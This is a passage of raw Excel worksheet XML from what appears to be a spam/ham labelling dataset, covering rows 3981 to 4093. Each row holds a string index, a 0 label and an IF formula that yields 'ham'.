        <v>3352</v>
      </c>
      <c r="B3981">
        <v>0</v>
      </c>
      <c r="C3981" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3982" t="s">
        <v>3353</v>
      </c>
      <c r="B3982">
        <v>0</v>
      </c>
      <c r="C3982" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3983" t="s">
        <v>3354</v>
      </c>
      <c r="B3983">
        <v>0</v>
      </c>
      <c r="C3983" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3984" t="s">
        <v>3355</v>
      </c>
      <c r="B3984">
        <v>0</v>
      </c>
      <c r="C3984" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3985" t="s">
        <v>3356</v>
      </c>
      <c r="B3985">
        <v>0</v>
      </c>
      <c r="C3985" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3986" t="s">
        <v>3357</v>
      </c>
      <c r="B3986">
        <v>0</v>
      </c>
      <c r="C3986" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3987" t="s">
        <v>3358</v>
      </c>
      <c r="B3987">
        <v>0</v>
      </c>
      <c r="C3987" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3988" t="s">
        <v>3359</v>
      </c>
      <c r="B3988">
        <v>0</v>
      </c>
      <c r="C3988" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3989" t="s">
        <v>3360</v>
      </c>
      <c r="B3989">
        <v>0</v>
      </c>
      <c r="C3989" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3990" t="s">
        <v>3361</v>
      </c>
      <c r="B3990">
        <v>0</v>
      </c>
      <c r="C3990" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3991" t="s">
        <v>3362</v>
      </c>
      <c r="B3991">
        <v>0</v>
      </c>
      <c r="C3991" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3992" t="s">
        <v>3363</v>
      </c>
      <c r="B3992">
        <v>0</v>
      </c>
      <c r="C3992" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3993" t="s">
        <v>3364</v>
      </c>
      <c r="B3993">
        <v>0</v>
      </c>
      <c r="C3993" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3994" t="s">
        <v>3365</v>
      </c>
      <c r="B3994">
        <v>0</v>
      </c>
      <c r="C3994" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3995" t="s">
        <v>3366</v>
      </c>
      <c r="B3995">
        <v>0</v>
      </c>
      <c r="C3995" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3996" t="s">
        <v>3367</v>
      </c>
      <c r="B3996">
        <v>0</v>
      </c>
      <c r="C3996" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3997" t="s">
        <v>3368</v>
      </c>
      <c r="B3997">
        <v>0</v>
      </c>
      <c r="C3997" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3998" t="s">
        <v>3369</v>
      </c>
      <c r="B3998">
        <v>0</v>
      </c>
      <c r="C3998" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3999" t="s">
        <v>3370</v>
      </c>
      <c r="B3999">
        <v>0</v>
      </c>
      <c r="C3999" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4000" t="s">
        <v>3371</v>
      </c>
      <c r="B4000">
        <v>0</v>
      </c>
      <c r="C4000" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4001" t="s">
        <v>3372</v>
      </c>
      <c r="B4001">
        <v>0</v>
      </c>
      <c r="C4001" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4002" t="s">
        <v>3373</v>
      </c>
      <c r="B4002">
        <v>0</v>
      </c>
      <c r="C4002" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4003" t="s">
        <v>3374</v>
      </c>
      <c r="B4003">
        <v>0</v>
      </c>
      <c r="C4003" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4004" t="s">
        <v>3375</v>
      </c>
      <c r="B4004">
        <v>0</v>
      </c>
      <c r="C4004" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4005" t="s">
        <v>3332</v>
      </c>
      <c r="B4005">
        <v>0</v>
      </c>
      <c r="C4005" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4006" t="s">
        <v>3376</v>
      </c>
      <c r="B4006">
        <v>0</v>
      </c>
      <c r="C4006" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4007" t="s">
        <v>3377</v>
      </c>
      <c r="B4007">
        <v>0</v>
      </c>
      <c r="C4007" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4008" t="s">
        <v>3378</v>
      </c>
      <c r="B4008">
        <v>0</v>
      </c>
      <c r="C4008" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4009" t="s">
        <v>3379</v>
      </c>
      <c r="B4009">
        <v>0</v>
      </c>
      <c r="C4009" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4010" t="s">
        <v>3380</v>
      </c>
      <c r="B4010">
        <v>0</v>
      </c>
      <c r="C4010" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4011" t="s">
        <v>3381</v>
      </c>
      <c r="B4011">
        <v>0</v>
      </c>
      <c r="C4011" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4012" t="s">
        <v>3382</v>
      </c>
      <c r="B4012">
        <v>0</v>
      </c>
      <c r="C4012" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4013" t="s">
        <v>3383</v>
      </c>
      <c r="B4013">
        <v>0</v>
      </c>
      <c r="C4013" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4014" t="s">
        <v>3384</v>
      </c>
      <c r="B4014">
        <v>0</v>
      </c>
      <c r="C4014" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4015" t="s">
        <v>3385</v>
      </c>
      <c r="B4015">
        <v>0</v>
      </c>
      <c r="C4015" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4016" t="s">
        <v>3386</v>
      </c>
      <c r="B4016">
        <v>0</v>
      </c>
      <c r="C4016" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4017" t="s">
        <v>3387</v>
      </c>
      <c r="B4017">
        <v>0</v>
      </c>
      <c r="C4017" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4018" t="s">
        <v>3388</v>
      </c>
      <c r="B4018">
        <v>0</v>
      </c>
      <c r="C4018" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4019" t="s">
        <v>3389</v>
      </c>
      <c r="B4019">
        <v>0</v>
      </c>
      <c r="C4019" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4020" t="s">
        <v>3390</v>
      </c>
      <c r="B4020">
        <v>0</v>
      </c>
      <c r="C4020" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4021" t="s">
        <v>3391</v>
      </c>
      <c r="B4021">
        <v>0</v>
      </c>
      <c r="C4021" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4022" t="s">
        <v>3392</v>
      </c>
      <c r="B4022">
        <v>0</v>
      </c>
      <c r="C4022" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4023" t="s">
        <v>3393</v>
      </c>
      <c r="B4023">
        <v>0</v>
      </c>
      <c r="C4023" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4024" t="s">
        <v>3319</v>
      </c>
      <c r="B4024">
        <v>0</v>
      </c>
      <c r="C4024" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4025" t="s">
        <v>3394</v>
      </c>
      <c r="B4025">
        <v>0</v>
      </c>
      <c r="C4025" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4026" t="s">
        <v>3395</v>
      </c>
      <c r="B4026">
        <v>0</v>
      </c>
      <c r="C4026" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4027" t="s">
        <v>3396</v>
      </c>
      <c r="B4027">
        <v>0</v>
      </c>
      <c r="C4027" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4028" t="s">
        <v>3397</v>
      </c>
      <c r="B4028">
        <v>0</v>
      </c>
      <c r="C4028" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4029" t="s">
        <v>3398</v>
      </c>
      <c r="B4029">
        <v>0</v>
      </c>
      <c r="C4029" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4030" t="s">
        <v>3314</v>
      </c>
      <c r="B4030">
        <v>0</v>
      </c>
      <c r="C4030" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4031" t="s">
        <v>3399</v>
      </c>
      <c r="B4031">
        <v>0</v>
      </c>
      <c r="C4031" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4032" t="s">
        <v>3400</v>
      </c>
      <c r="B4032">
        <v>0</v>
      </c>
      <c r="C4032" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4033" t="s">
        <v>3401</v>
      </c>
      <c r="B4033">
        <v>0</v>
      </c>
      <c r="C4033" t="str">
        <f t="shared" si="62"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4034" t="s">
        <v>3402</v>
      </c>
      <c r="B4034">
        <v>0</v>
      </c>
      <c r="C4034" t="str">
        <f t="shared" ref="C4034:C4097" si="63">IF(B4034="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4035" t="s">
        <v>3403</v>
      </c>
      <c r="B4035">
        <v>0</v>
      </c>
      <c r="C4035" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4036" t="s">
        <v>3331</v>
      </c>
      <c r="B4036">
        <v>0</v>
      </c>
      <c r="C4036" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4037" t="s">
        <v>3404</v>
      </c>
      <c r="B4037">
        <v>0</v>
      </c>
      <c r="C4037" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4038" t="s">
        <v>3405</v>
      </c>
      <c r="B4038">
        <v>0</v>
      </c>
      <c r="C4038" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4039" t="s">
        <v>3406</v>
      </c>
      <c r="B4039">
        <v>0</v>
      </c>
      <c r="C4039" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4040" t="s">
        <v>3407</v>
      </c>
      <c r="B4040">
        <v>0</v>
      </c>
      <c r="C4040" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4041" t="s">
        <v>3408</v>
      </c>
      <c r="B4041">
        <v>0</v>
      </c>
      <c r="C4041" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4042" t="s">
        <v>3409</v>
      </c>
      <c r="B4042">
        <v>0</v>
      </c>
      <c r="C4042" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4043" t="s">
        <v>3410</v>
      </c>
      <c r="B4043">
        <v>0</v>
      </c>
      <c r="C4043" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4044" t="s">
        <v>3411</v>
      </c>
      <c r="B4044">
        <v>0</v>
      </c>
      <c r="C4044" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4045" t="s">
        <v>3412</v>
      </c>
      <c r="B4045">
        <v>0</v>
      </c>
      <c r="C4045" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4046" t="s">
        <v>3413</v>
      </c>
      <c r="B4046">
        <v>0</v>
      </c>
      <c r="C4046" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4047" t="s">
        <v>3414</v>
      </c>
      <c r="B4047">
        <v>0</v>
      </c>
      <c r="C4047" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4048" t="s">
        <v>3415</v>
      </c>
      <c r="B4048">
        <v>0</v>
      </c>
      <c r="C4048" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4049" t="s">
        <v>3416</v>
      </c>
      <c r="B4049">
        <v>0</v>
      </c>
      <c r="C4049" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4050" t="s">
        <v>3309</v>
      </c>
      <c r="B4050">
        <v>0</v>
      </c>
      <c r="C4050" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4051" t="s">
        <v>3417</v>
      </c>
      <c r="B4051">
        <v>0</v>
      </c>
      <c r="C4051" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4052" t="s">
        <v>3418</v>
      </c>
      <c r="B4052">
        <v>0</v>
      </c>
      <c r="C4052" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4053" t="s">
        <v>3419</v>
      </c>
      <c r="B4053">
        <v>0</v>
      </c>
      <c r="C4053" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4054" t="s">
        <v>3420</v>
      </c>
      <c r="B4054">
        <v>0</v>
      </c>
      <c r="C4054" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4055" t="s">
        <v>3421</v>
      </c>
      <c r="B4055">
        <v>0</v>
      </c>
      <c r="C4055" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4056" t="s">
        <v>3422</v>
      </c>
      <c r="B4056">
        <v>0</v>
      </c>
      <c r="C4056" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4057" t="s">
        <v>3326</v>
      </c>
      <c r="B4057">
        <v>0</v>
      </c>
      <c r="C4057" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4058" t="s">
        <v>3423</v>
      </c>
      <c r="B4058">
        <v>0</v>
      </c>
      <c r="C4058" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4059" t="s">
        <v>3424</v>
      </c>
      <c r="B4059">
        <v>0</v>
      </c>
      <c r="C4059" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4060" t="s">
        <v>3327</v>
      </c>
      <c r="B4060">
        <v>0</v>
      </c>
      <c r="C4060" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4061" t="s">
        <v>3425</v>
      </c>
      <c r="B4061">
        <v>0</v>
      </c>
      <c r="C4061" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4062" t="s">
        <v>3316</v>
      </c>
      <c r="B4062">
        <v>0</v>
      </c>
      <c r="C4062" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4063" t="s">
        <v>3426</v>
      </c>
      <c r="B4063">
        <v>0</v>
      </c>
      <c r="C4063" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4064" t="s">
        <v>3315</v>
      </c>
      <c r="B4064">
        <v>0</v>
      </c>
      <c r="C4064" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4065" t="s">
        <v>3427</v>
      </c>
      <c r="B4065">
        <v>0</v>
      </c>
      <c r="C4065" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4066" t="s">
        <v>3428</v>
      </c>
      <c r="B4066">
        <v>0</v>
      </c>
      <c r="C4066" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4067" t="s">
        <v>3429</v>
      </c>
      <c r="B4067">
        <v>0</v>
      </c>
      <c r="C4067" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4068" t="s">
        <v>3430</v>
      </c>
      <c r="B4068">
        <v>0</v>
      </c>
      <c r="C4068" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4069" t="s">
        <v>3431</v>
      </c>
      <c r="B4069">
        <v>0</v>
      </c>
      <c r="C4069" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4070" t="s">
        <v>3432</v>
      </c>
      <c r="B4070">
        <v>0</v>
      </c>
      <c r="C4070" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4071" t="s">
        <v>3433</v>
      </c>
      <c r="B4071">
        <v>0</v>
      </c>
      <c r="C4071" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4072" t="s">
        <v>3434</v>
      </c>
      <c r="B4072">
        <v>0</v>
      </c>
      <c r="C4072" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4073" t="s">
        <v>3435</v>
      </c>
      <c r="B4073">
        <v>0</v>
      </c>
      <c r="C4073" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4074" t="s">
        <v>3436</v>
      </c>
      <c r="B4074">
        <v>0</v>
      </c>
      <c r="C4074" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4075" t="s">
        <v>3437</v>
      </c>
      <c r="B4075">
        <v>0</v>
      </c>
      <c r="C4075" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4076" t="s">
        <v>3438</v>
      </c>
      <c r="B4076">
        <v>0</v>
      </c>
      <c r="C4076" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4077" t="s">
        <v>3439</v>
      </c>
      <c r="B4077">
        <v>0</v>
      </c>
      <c r="C4077" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4078" t="s">
        <v>3440</v>
      </c>
      <c r="B4078">
        <v>0</v>
      </c>
      <c r="C4078" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4079" t="s">
        <v>3441</v>
      </c>
      <c r="B4079">
        <v>0</v>
      </c>
      <c r="C4079" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4080" t="s">
        <v>3442</v>
      </c>
      <c r="B4080">
        <v>0</v>
      </c>
      <c r="C4080" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4081" t="s">
        <v>3443</v>
      </c>
      <c r="B4081">
        <v>0</v>
      </c>
      <c r="C4081" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4082" t="s">
        <v>3444</v>
      </c>
      <c r="B4082">
        <v>0</v>
      </c>
      <c r="C4082" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4083" t="s">
        <v>3445</v>
      </c>
      <c r="B4083">
        <v>0</v>
      </c>
      <c r="C4083" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4084" t="s">
        <v>3446</v>
      </c>
      <c r="B4084">
        <v>0</v>
      </c>
      <c r="C4084" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4085" t="s">
        <v>3447</v>
      </c>
      <c r="B4085">
        <v>0</v>
      </c>
      <c r="C4085" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4086" t="s">
        <v>3448</v>
      </c>
      <c r="B4086">
        <v>0</v>
      </c>
      <c r="C4086" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4087" t="s">
        <v>3449</v>
      </c>
      <c r="B4087">
        <v>0</v>
      </c>
      <c r="C4087" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4088" t="s">
        <v>3450</v>
      </c>
      <c r="B4088">
        <v>0</v>
      </c>
      <c r="C4088" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4089" t="s">
        <v>3451</v>
      </c>
      <c r="B4089">
        <v>0</v>
      </c>
      <c r="C4089" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4090" t="s">
        <v>3452</v>
      </c>
      <c r="B4090">
        <v>0</v>
      </c>
      <c r="C4090" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4091" t="s">
        <v>3453</v>
      </c>
      <c r="B4091">
        <v>0</v>
      </c>
      <c r="C4091" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4092" t="s">
        <v>3454</v>
      </c>
      <c r="B4092">
        <v>0</v>
      </c>
      <c r="C4092" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4093" t="s">
        <v>3455</v>
      </c>
      <c r="B4093">
        <v>0</v>
      </c>
      <c r="C4093" t="str">
        <f t="shared" si="63"/>
